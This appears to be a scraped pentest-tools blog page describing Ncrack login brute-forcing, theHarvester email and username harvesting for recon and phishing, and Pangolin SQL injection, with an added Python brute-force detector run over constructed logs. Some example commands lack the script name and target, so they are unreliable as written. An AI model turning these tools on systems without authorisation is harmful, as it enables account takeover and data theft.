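HSTS does not protect the very first visit (the header has to be received over HTTPS once), which is what the browser preload lists exist for; the `preload` directive and a long `max-age` are the conditions for being admitted to them.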

You can also watch this video tutorial on how to perform SSLstrip attack.

Ncrack - Network Authentication Cracking Tool

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and many more.

The latest version, ncrack-0.3ALPHA, adds support for two famous protocols – SMB & RDP and it seems to be working pretty well! Using these, you can crack all Microsoft CIFS/SMB services as well as Unix-based Samba servers and crack all Windows RDP servers from XP and above.

Supported modules: SSH, FTP, TELNET, HTTP(S), SMB, RDP, POP3(S)

You can download ncrack here:
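Both the Terminal Services brute-force tools described earlier and Ncrack leave the same trace on the target: a burst of failed logons for one account from one source in a short window. The following is an added example, not code from the page or from either tool, that implements that detection over a constructed log: it parses lines shaped like a Windows Security event 4625 export (logon type 10 is RemoteInteractive, i.e. RDP) mixed with OpenSSH "Failed password" lines, and raises one alert per (service, source) when the failure count inside a sliding window crosses a threshold. The line formats only approximate the real ones, the `year` argument exists because syslog lines carry no year, and the hosts, users and IPs are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real captures). IPs are documentation ranges.
SAMPLE_LOG = """\
2011-03-01 10:00:01 4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.7
2011-03-01 10:00:02 4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.7
2011-03-01 10:00:03 4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.7
2011-03-01 10:00:04 4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.7
2011-03-01 10:00:05 4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.7
2011-03-01 10:00:06 4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.7
2011-03-01 10:01:00 4625 LogonType=10 TargetUserName=jsmith IpAddress=192.0.2.5
2011-03-01 10:09:00 4625 LogonType=10 TargetUserName=jsmith IpAddress=192.0.2.5
Mar  1 10:05:00 srv1 sshd[2211]: Failed password for root from 198.51.100.9 port 51122 ssh2
Mar  1 10:05:05 srv1 sshd[2212]: Failed password for root from 198.51.100.9 port 51123 ssh2
Mar  1 10:05:09 srv1 sshd[2213]: Failed password for invalid user admin from 198.51.100.9 port 51124 ssh2
Mar  1 10:05:14 srv1 sshd[2214]: Failed password for root from 198.51.100.9 port 51125 ssh2
Mar  1 10:05:20 srv1 sshd[2215]: Failed password for root from 198.51.100.9 port 51126 ssh2
"""

WIN_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) 4625 LogonType=(\d+) TargetUserName=(\S+) IpAddress=(\S+)")
SSH_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")

def parse_line(line: str, year: int):
    """Return (timestamp, service, user, source_ip) for a failed logon, else None."""
    m = WIN_RE.match(line)
    if m:
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        service = "rdp" if m.group(2) == "10" else "windows-logon"
        return ts, service, m.group(3), m.group(4)
    m = SSH_RE.match(line)
    if m:
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        return ts, "ssh", m.group(2), m.group(3)
    return None

def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1), year=2011) -> dict:
    """Alert once per (service, source) when `threshold` failures land inside `window`."""
    events = sorted(e for e in (parse_line(l, year) for l in lines) if e)
    recent = defaultdict(deque)     # (service, source) -> timestamps inside the window
    alerts = {}
    for ts, service, user, src in events:
        key = (service, src)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = {"first_seen": q[0], "tripped_at": ts, "count": len(q)}
    return alerts

if __name__ == "__main__":
    for (service, src), info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{service} brute force from {src}: {info['count']} failures "
              f"between {info['first_seen']} and {info['tripped_at']}")
```

Tuning is the whole game here: a threshold of five in a minute is far below what either tool produces and above what a user mistyping a password produces, and the two `jsmith` failures nine minutes apart correctly stay silent. Pair the alert with an account lockout policy, Network Level Authentication for RDP, and not exposing 3389 or 22 to the Internet at all.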

theHarvester - Email, User names and Subdomain/Hostnames Finder.

One of the first parts of recon in a pentest is gathering valid login names and emails. We can use these to profile our target, bruteforce authentication systems, send client-side attacks (through phishing), look through social networks for juicy info on platforms and technologies, etc.

theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources. It's a really simple tool, but very effective.
The sources supported are:
  •    Google - emails,subdomains/hostnames
  •    Bing search - emails, subdomains/hostnames
  •    Pgp servers - emails, subdomains/hostnames
  •    Linkedin - user names

Some examples:

Searching email accounts for the domain; it will work with the first 500 Google results:

./ -d -l 500 -b google

Searching email accounts for the domain on a PGP server; here it's not necessary to specify the limit.

./ -d -b pgp

Searching for user names of people who work at the company Microsoft; we use Google as the search engine, so we need to specify the limit of results we want to use:

./ -d microsoft -l 200 -b linkedin

You can download theHarvester here:

Pangolin - Automatic SQL Injection Tool

Pangolin is an automatic SQL injection penetration testing tool developed by NOSEC.
Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve the DBMS session user and database, enumerate users, password hashes, privileges and databases, dump entire or user-specified DBMS tables/columns, run their own SQL statements, read specific files on the file system, and more.

Database support:
Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, SQLite3, Sybase.

More video tutorials here:

You can download the free edition here:

Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!
